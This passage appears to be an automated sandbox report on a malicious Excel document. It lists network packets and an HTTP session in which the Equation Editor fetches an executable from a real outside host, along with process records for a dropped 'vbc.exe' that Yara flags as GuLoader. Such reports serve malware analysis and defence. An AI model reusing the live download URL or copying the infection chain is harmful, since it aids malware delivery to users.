                  Jul 14, 2021 16:55:36.409729004 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:36.409774065 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:36.664187908 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.664213896 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.664227009 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.664238930 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.664453983 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:36.664853096 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.664872885 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.664917946 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.664928913 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:36.664962053 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.664969921 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:36.665000916 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:36.919806004 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.919847965 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.920083046 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:36.921953917 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.921977043 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.921994925 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.922015905 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.922039032 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.922054052 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:36.922075033 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.922096014 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.922123909 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.922130108 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:36.922152042 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.922161102 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:36.922180891 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.922192097 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:36.922224045 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:36.922280073 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.922302008 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.922329903 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:36.922357082 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:36.922379971 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.922404051 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.922447920 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:36.922467947 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:36.924274921 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.174513102 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.174547911 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.174573898 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.174653053 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.174719095 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.174815893 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.177390099 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.177429914 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.177514076 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.177553892 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.177598953 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.177658081 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.177680016 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.177701950 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.177716970 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.177757978 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.177798986 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.177934885 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.177982092 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.178034067 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.178080082 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.178111076 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.178124905 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.178138971 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.178162098 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.178199053 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.178231001 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.178287983 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.178324938 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.178426027 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.178448915 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.178464890 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.178488016 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.178685904 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.178731918 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.178793907 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.178831100 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.178843975 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.178885937 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.178950071 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.178973913 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.178986073 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.179012060 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.179034948 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.179059029 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.179069996 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.179112911 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.179131985 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.179157972 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:37.179168940 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:37.179205894 CEST  49165        80         192.168.2.22     180.214.239.39

                  HTTP Request Dependency Graph

                  • 180.214.239.39

                  HTTP Packets

                  Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                  0           192.168.2.22  49165        180.214.239.39  80                C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Timestamp                             kBytes transferred  Direction  Data
                  Jul 14, 2021 16:55:36.154084921 CEST  0                   OUT        GET /port/.svchost.exe HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: 180.214.239.39
                  Connection: Keep-Alive
                  Jul 14, 2021 16:55:36.409609079 CEST  1                   IN         HTTP/1.1 200 OK
                  Date: Wed, 14 Jul 2021 14:55:35 GMT
                  Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                  Last-Modified: Tue, 13 Jul 2021 17:05:39 GMT
                  ETag: "41470-5c7043f493d18"
                  Accept-Ranges: bytes
                  Content-Length: 267376
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: application/x-msdownload
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$yRichPELFR`pp@d(zX ( .text0Y` `.datapp@.rsrcz@@IMSVBVM60.DLL


                  Code Manipulations

                  Statistics

                  Behavior

                  System Behavior

                  General

                  Start time:16:54:44
                  Start date:14/07/2021
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Imagebase:0x13f820000
                  File size:27641504 bytes
                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:16:55:06
                  Start date:14/07/2021
                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Wow64 process (32bit):true
                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Imagebase:0x400000
                  File size:543304 bytes
                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:16:55:09
                  Start date:14/07/2021
                  Path:C:\Users\Public\vbc.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\Public\vbc.exe'
                  Imagebase:0x400000
                  File size:267376 bytes
                  MD5 hash:FCFB0EC70F1419EDE8A534CC95CB61E9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Visual Basic
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000006.00000000.2148896829.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
                  Antivirus matches:
                  • Detection: 7%, ReversingLabs
                  Reputation:low

                  Disassembly

                  Code Analysis
